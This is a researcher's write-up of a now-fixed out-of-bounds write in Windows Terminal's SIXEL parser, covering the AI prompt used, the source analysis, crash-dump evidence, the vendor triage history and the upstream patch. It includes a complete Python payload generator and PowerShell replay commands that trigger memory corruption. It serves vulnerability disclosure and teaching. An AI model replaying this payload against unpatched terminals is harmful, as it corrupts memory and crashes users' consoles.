
Windows Terminal SIXEL: when a good prompt met a stubborn OOB write

May 12, 2026 · Windows Terminal · OpenConsole · SIXEL · OOB write

This was not a clean "AI finds bug, vendor reproduces, patch lands" story. It was messier and more useful than that. A focused prompt helped me find a real out-of-bounds write in Windows Terminal's SIXEL parser. WinDbg convinced me it was a true positive long before the fix landed, but the report also showed where modern vulnerability triage gets hard: a small change in output chunking made the difference between a visible allocation exception and the later access violation I was seeing locally.

The bug was eventually fixed in Windows Terminal PR #20213, with the commit message saying exactly what mattered: "prevent allocating an absurd amount of memory or writing OOB." I am writing this down because the technical bug is only half the lesson. The other half is that prompt quality, repro detail, and patience now matter a lot more than a crash screenshot.

Upstream fix: c829d4ca5, "sixel: prevent allocating an absurd amount of memory or writing OOB (#20213)", May 12, 2026, microsoft/terminal

Scope:

This is a fixed-bug write-up. I am not claiming RCE here. The confirmed issue was an out-of-bounds write / memory corruption condition in the SIXEL parsing path, fixed by stopping the oversized hidden image growth path and aborting SIXEL parsing after exceptions.

The prompt that helped

The useful prompt was not just "find bugs in Terminal." It constrained the model to a target, a bug class, and an evidence bar. That changed the work from broad code browsing into a repeatable security review loop.

We are doing authorized offensive security research in a controlled lab.
Focus on the Windows Terminal / OpenConsole source code.
Look for remotely reachable memory-safety issues triggered by crafted terminal content or files.
Prioritize integer overflows, OOB writes, and parser state bugs.

For each candidate:
- show the exact source path and function
- explain attacker control over the input
- build a minimal PoC payload
- require crash-dump evidence before calling it a true positive
- do not treat speculation as a finding

The important part is the last two lines. AI is very good at producing plausible vulnerability narratives. It is much less useful if you let it stop at "this looks risky." For this bug, the prompt forced the loop to end in a payload, a dump, a stack trace, and a bounds calculation.

The source-level smell

The first thing that looked suspicious was image-buffer sizing in SixelParser::_resizeImageBuffer(). The required size was computed in til::CoordType, a signed 32-bit coordinate type, and only then cast to size_t and compared against the vector size, so any overflow happened before the comparison could catch it.

void SixelParser::_resizeImageBuffer(const til::CoordType requiredHeight)
{
    const auto requiredSize = (_imageCursor.y + requiredHeight) * _imageMaxWidth;
    if (static_cast<size_t>(requiredSize) > _imageBuffer.size())
    {
        static constexpr auto transparentPixel = IndexedPixel{ .transparent = true };
        _imageBuffer.resize(requiredSize, transparentPixel);
    }
}

Later, the write path derived a pointer from the same image geometry:

const auto targetOffset = _imageCursor.y * _imageMaxWidth + _imageCursor.x;
auto imageBufferPtr = reinterpret_cast<int16_t*>(_imageBuffer.data() + targetOffset);

That does not automatically prove a vulnerability. The real question was whether a terminal-controlled sequence could drive the parser into a state where the vector did not match the cursor geometry. The path that mattered was SIXEL display mode plus many SIXEL next-line commands.
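To make the sizing concern concrete, here is a small Python sketch that models the same expression with signed 32-bit wraparound. It is an illustration under stated assumptions, not the parser's code. The 32760-pixel width (3276 columns at an assumed 10 pixels per cell) and the 6-pixel band height are assumptions, and the helper names are hypothetical. Signed overflow in C++ is formally undefined behavior, so two's-complement wrapping is only the typical outcome.

```python
INT32_MAX = 2**31 - 1


def wrap_int32(value: int) -> int:
    """Reduce a Python int to the value a two's-complement int32 would hold."""
    value &= 0xFFFFFFFF
    return value - 2**32 if value > INT32_MAX else value


def as_size_t(value: int) -> int:
    """Model static_cast<size_t>() of a signed value on a 64-bit target."""
    return value & 0xFFFFFFFFFFFFFFFF


def required_size(cursor_y: int, required_height: int, max_width: int) -> int:
    """Model (_imageCursor.y + requiredHeight) * _imageMaxWidth in int32."""
    return wrap_int32((cursor_y + required_height) * max_width)


def first_wrapping_line(max_width: int, band_height: int) -> int:
    """Return the first next-line count whose size computation exceeds int32."""
    line = 0
    while True:
        line += 1
        cursor_y = line * band_height  # the cursor moves down before the resize
        if (cursor_y + band_height) * max_width > INT32_MAX:
            return line


if __name__ == "__main__":
    width, band = 32760, 6  # assumed values, not taken from the parser
    line = first_wrapping_line(width, band)
    wrapped = required_size(line * band, band, width)
    print(f"first wrapping next-line: {line}")
    print(f"wrapped int32 size: {wrapped}")
    print(f"as size_t: {as_size_t(wrapped):#x}")
```

Under these assumptions the computation wraps before the 12000 next-line commands in the reproducer are used up, and the negative result becomes a very large size_t after the cast.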

The payload shape

The reproducer was small. It requested a very wide terminal, enabled SIXEL display mode, started a SIXEL DCS sequence, sent a large number of DECGNL next-line commands (-), and then ended the DCS.

ESC [ 8 ; 24 ; 3276 t
ESC [ ? 80 h
ESC P q
"-" repeated 12000 times
ESC \

python3.10 poc/sixel_integer_overflow_poc.py --lines 12000 --resize-cols 3276 --output payload.bin

The generator is intentionally small: it writes one resize request, enables SIXEL display mode, opens a SIXEL DCS, emits many next-line commands, and then terminates the sequence. The standalone script is here: sixel_integer_overflow_poc.py.

Full payload generator (Python)


#!/usr/bin/env python3
"""
Generate a crafted VT payload that drives the SIXEL parser's signed int32 size math.

This payload is intended for authorized lab testing only.
"""

from __future__ import annotations

import argparse
import sys


def _build_payload(lines: int, resize_cols: int, resize_rows: int) -> bytes:
    parts: list[bytes] = []

    # Optional: request a very wide terminal to reduce the number of SIXEL lines needed.
    if resize_cols > 0:
        parts.append(f"\x1b[8;{resize_rows};{resize_cols}t".encode("ascii"))

    # Enable SIXEL display mode (DECSDM).
    parts.append(b"\x1b[?80h")

    # Start SIXEL: DCS ... q
    parts.append(b"\x1bPq")

    # A run of DECGNL commands ('-') repeatedly moves the image cursor down and
    # triggers _resizeImageBuffer(_sixelHeight) each time.
    parts.append(b"-" * lines)

    # End DCS string.
    parts.append(b"\x1b\\")
    return b"".join(parts)


def main() -> int:
    parser = argparse.ArgumentParser(description="Generate a SIXEL integer-overflow stress payload.")
    parser.add_argument("--lines", type=int, default=200000, help="Number of SIXEL next-line commands ('-').")
    parser.add_argument(
        "--resize-cols",
        type=int,
        default=3276,
        help="Requested columns via CSI 8 ; rows ; cols t. Use 0 to skip resize request.",
    )
    parser.add_argument("--resize-rows", type=int, default=24, help="Rows used with --resize-cols.")
    parser.add_argument("--output", default="poc/sixel_integer_overflow_payload.bin", help="Output payload path.")
    parser.add_argument("--stdout", action="store_true", help="Write payload to stdout instead of --output.")
    args = parser.parse_args()

    if args.lines <= 0:
        parser.error("--lines must be > 0")
    if args.resize_cols < 0 or args.resize_rows <= 0:
        parser.error("resize values must be positive (or cols=0 to disable resize request)")

    payload = _build_payload(args.lines, args.resize_cols, args.resize_rows)

    if args.stdout:
        sys.stdout.buffer.write(payload)
        return 0

    with open(args.output, "wb") as f:
        f.write(payload)

    print(f"[+] Wrote {len(payload)} bytes to {args.output}")
    print("[*] Replay examples (raw byte output):")
    print("    PowerShell:")
    print(
        "      $b=[IO.File]::ReadAllBytes('"
        + args.output
        + "');$s=[Console]::OpenStandardOutput();$s.Write($b,0,$b.Length);$s.Flush()"
    )
    print("    Python:")
    print(f"      python -c \"import sys;sys.stdout.buffer.write(open(r'{args.output}','rb').read())\"")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())

The raw-byte replay detail mattered. The path was sensitive to how the terminal received chunks of the sequence.

$b=[IO.File]::ReadAllBytes("$env:USERPROFILE\Desktop\payload.bin")
$s=[Console]::OpenStandardOutput()
$s.Write($b,0,$b.Length)
$s.Flush()
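Because chunking turned out to matter, a replay helper that sets the chunk size explicitly can make a repro easier to describe. The sketch below is a hypothetical helper, not part of the original PoC. The chunk size and delay are illustrative knobs, and nothing here establishes which values correspond to PowerShell 5 or PowerShell 7. Layers between the script and the terminal may still regroup the bytes.

```python
import sys
import time
from typing import BinaryIO, Iterator


def iter_chunks(data: bytes, chunk_size: int) -> Iterator[bytes]:
    """Yield consecutive slices of data, each at most chunk_size bytes long."""
    if chunk_size <= 0:
        raise ValueError("chunk_size must be > 0")
    for start in range(0, len(data), chunk_size):
        yield data[start:start + chunk_size]


def replay(data: bytes, stream: BinaryIO, chunk_size: int, delay: float = 0.0) -> int:
    """Write data to stream one chunk at a time, flushing after each write.

    Returns the number of chunks written.
    """
    count = 0
    for chunk in iter_chunks(data, chunk_size):
        stream.write(chunk)
        stream.flush()
        count += 1
        if delay:
            time.sleep(delay)  # optional pause between chunks
    return count


if __name__ == "__main__" and len(sys.argv) == 3:
    # Usage: python replay_chunked.py payload.bin 4096
    payload_path, size = sys.argv[1], int(sys.argv[2])
    with open(payload_path, "rb") as f:
        replay(f.read(), sys.stdout.buffer, size)
```

Recording the chunk size used for a successful repro in the report gives triage one more concrete variable to match.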

The crash proof

On OpenConsole.exe 1.23.2601.21001 from Windows Terminal v1.23.20211.0, the final crash was a write access violation in the SIXEL parser. The dump showed the write target past the vector end.

Failure.Bucket:
INVALID_POINTER_WRITE_c0000005_OpenConsole.exe!Microsoft::Console::VirtualTerminal::SixelParser::_parseCommandChar

Faulting instruction:
mov word ptr [rdx],cx

_Myend : 0x000001e3`cbc71d40
rdx    : 0x000001e3`cbc802d2
rdx - _Myend = 58770 (0xE592)
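
The arithmetic behind that last line is easy to re-check. This small sketch parses the two WinDbg-style addresses shown above and recomputes the distance. The helper name is hypothetical, and the 2-byte store width is read off the mov word ptr instruction, not taken from the vector's element type.

```python
def parse_windbg_addr(text: str) -> int:
    """Parse a WinDbg 64-bit address such as 0x000001e3`cbc71d40."""
    return int(text.replace("`", ""), 16)


myend = parse_windbg_addr("0x000001e3`cbc71d40")   # vector end (_Myend)
target = parse_windbg_addr("0x000001e3`cbc802d2")  # rdx, the store address

distance = target - myend
print(f"rdx - _Myend = {distance} ({distance:#x})")
print(f"distance in 2-byte stores: {distance // 2}")
```

A positive distance means the store address lies beyond the end of the vector's storage, which is the property the dump was used to establish.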

One detail later became important: my ProcDump output also showed a first-chance std::bad_alloc before the final access violation. That meant the allocation failure path existed in my repro too; it just was not the end of the story.

Where triage got stuck

MSRC tried to reproduce the issue more than once and could not get the same access violation. Their path usually stopped at std::vector throwing bad_alloc or length_error during resize. From their point of view, the exception appeared to prevent the AV.

That is a fair triage problem. As bug bounty programs receive more AI-assisted reports, they will see more reports that are close to real bugs but missing one small precondition. In this case, the missing precondition was not a magic registry setting. It was output chunking. PowerShell 5 and PowerShell 7 did not behave the same way for this payload.

The maintainer explanation:

The sequence could throw during an incremental resize, but the parser state and vector were not reset. Later chunks of the same DCS sequence continued processing and assumed the resize had succeeded. That is why one environment saw only "vector too long", while another reached the later OOB write.

The GitHub turn

Before GitHub, I had already tried MSRC twice. The first case was created on January 30, 2026. The second case was created on February 24, 2026 with better crash evidence and was last modified on March 26, 2026. Both ended as complete/closed, with the conclusion that the issue could not be reproduced. On their side, the repro usually stopped at a safe-looking "vector too long" exception.

From my side, the WinDbg evidence was hard to ignore. The register state and vector bounds showed an actual write past _Myend, not just a generic crash. That made me want to understand whether I had a false positive, whether the report was missing a precondition, or whether the triage path was simply exercising a different chunking behavior. So I opened GitHub issue #20149 with the source-level concern, the payload shape, the dump evidence, and the exact WinDbg bounds proof.

That public thread made the missing context visible. The maintainers tested different shells, narrowed the behavior to chunking, and connected the bad allocation path to the later parser-state problem.

- Jan 30, 2026: First MSRC report created for the Windows Terminal SIXEL integer-overflow/OOB-write behavior. It was later marked complete/closed as not reproducible.
- Feb 24, 2026: Second MSRC case opened with stronger crash evidence. The portal listed case 108187 and the report title "OpenConsole SIXEL parser out-of-bounds write via crafted..."
- Mar 26, 2026: The second MSRC case was last modified and ultimately closed as not reproducible. At this point I still had the WinDbg OOB proof locally.
- GitHub issue: #20149 was opened with the PoC structure, crash evidence, and vector-bounds proof.
- Maintainer repro: The team initially reproduced "vector too long", then identified PowerShell/version chunking as the missing behavior.
- May 12, 2026: #20213 landed on main as c829d4ca5 and closed the issue.
- Servicing: The fix was moved through the 1.24 and 1.25 servicing pipelines with backport commits referenced from the issue.

The fix

The merged fix has two parts. First, SIXEL character processing is wrapped in a catch-all. If parsing throws, the handler returns false, which tells the state machine to ignore the rest of the DCS content.

return [&](const auto ch) {
    try
    {
        _parseCommandChar(ch);
    }
    catch (...)
    {
        // Ignore all further content.
        return false;
    }
    return true;
};
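
Why this guard matters alongside chunking can be shown with a toy model. The sketch below is not the real parser. The class, the tiny buffer limits, and the "~" character standing in for a later pixel write are all hypothetical, and the payload in this post contains only "-". It only illustrates the pattern: a failed resize leaves the cursor ahead of the buffer, and a later chunk then writes using that stale cursor unless the rest of the DCS string is ignored.

```python
class ToySixelState:
    """Toy stand-in for parser state: a pixel buffer plus a cursor row."""

    def __init__(self, width: int, max_pixels: int) -> None:
        self.width = width
        self.max_pixels = max_pixels  # hypothetical allocation ceiling
        self.buffer: list[int] = []
        self.cursor_y = 0
        self.oob_writes = 0

    def next_line(self, band_height: int = 6) -> None:
        # The cursor moves first; the resize may then fail and leave it stale.
        self.cursor_y += band_height
        required = (self.cursor_y + band_height) * self.width
        if required > self.max_pixels:
            raise MemoryError("toy resize failed")
        if required > len(self.buffer):
            self.buffer.extend([0] * (required - len(self.buffer)))

    def write_pixel(self) -> None:
        offset = self.cursor_y * self.width
        if offset >= len(self.buffer):
            self.oob_writes += 1  # a raw-pointer write would land out of bounds
        else:
            self.buffer[offset] = 1


def feed(chunks: list[str], abort_on_exception: bool) -> int:
    """Feed chunks of one DCS string; return the number of out-of-bounds writes."""
    state = ToySixelState(width=4, max_pixels=100)
    ignoring = False
    for chunk in chunks:
        if ignoring:
            continue  # models the handler returning false for the rest of the DCS
        try:
            for ch in chunk:
                if ch == "-":
                    state.next_line()
                else:
                    state.write_pixel()
        except MemoryError:
            # Either way, the exception drops the remainder of this chunk.
            ignoring = abort_on_exception
    return state.oob_writes


if __name__ == "__main__":
    print("one chunk, no guard: ", feed(["-----~"], abort_on_exception=False))
    print("two chunks, no guard:", feed(["-----", "~"], abort_on_exception=False))
    print("two chunks, guarded: ", feed(["-----", "~"], abort_on_exception=True))
```

In this toy, the single-chunk run never reaches the write because the exception discards the rest of the chunk, while the two-chunk run does reach it. That is the same shape as one environment stopping at the exception and another hitting the later write.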

Second, _executeNextLine() stops growing the hidden image once there is no visible pixel height left. In SIXEL display mode, the image should not keep extending beyond the bottom of the display if the extra rows will never render.

if (_availablePixelHeight > 0)
{
    _imageCursor.y += _sixelHeight;
    _availablePixelHeight -= _sixelHeight;
    _resizeImageBuffer(_sixelHeight);
    _fillImageBackgroundWhenScrolled();
}
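
The effect of that guard on a long run of next-line commands can be sketched in a few lines. The 480-pixel available height and the 6-pixel band height are assumed values chosen for illustration, and the function is a hypothetical model of the cursor arithmetic only, not of the parser.

```python
def final_cursor_y(next_lines: int, available_height: int,
                   band_height: int = 6, guarded: bool = True) -> int:
    """Return the image cursor row after a run of next-line commands."""
    cursor_y = 0
    for _ in range(next_lines):
        if guarded and available_height <= 0:
            continue  # no visible height left, so the image stops growing
        cursor_y += band_height
        available_height -= band_height
    return cursor_y


if __name__ == "__main__":
    print("unguarded:", final_cursor_y(12000, 480, guarded=False))
    print("guarded:  ", final_cursor_y(12000, 480, guarded=True))
```

With the guard, the cursor stops advancing once the assumed visible height is used up, so the size computation never sees the large row counts that the unguarded run produces.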

It is worth noting what the fix did not do: it did not rewrite _resizeImageBuffer() into fully overflow-safe arithmetic. The fix instead removes the dangerous growth path for this bug and prevents exception recovery from continuing inside a stale SIXEL transaction.

The bigger lesson

I do think AI will increase the volume of this class of finding. Models are getting good at noticing memory-safety patterns: size math, parser state, allocator failure paths, and "this vector must have grown before this write" assumptions.

But that does not mean every AI-assisted report is ready for a bounty queue. The responsibility on the researcher is higher, not lower. If a finding depends on output chunking, shell version, terminal mode, or an exception being swallowed between transactions, the report needs to say so. I missed that part at first. The dump was real, but the repro was not complete enough.

In the end, the effective part was not "AI found a bug." It was the loop: constrain the model, force a PoC, capture the dump, ask why triage sees something different, and keep reducing the mismatch until the bug becomes obvious to someone else too.

Thanks to the Windows Terminal maintainers for digging into the chunking behavior and landing the fix. This post is written from the researcher's side of the timeline; the useful outcome is that the bug is now fixed.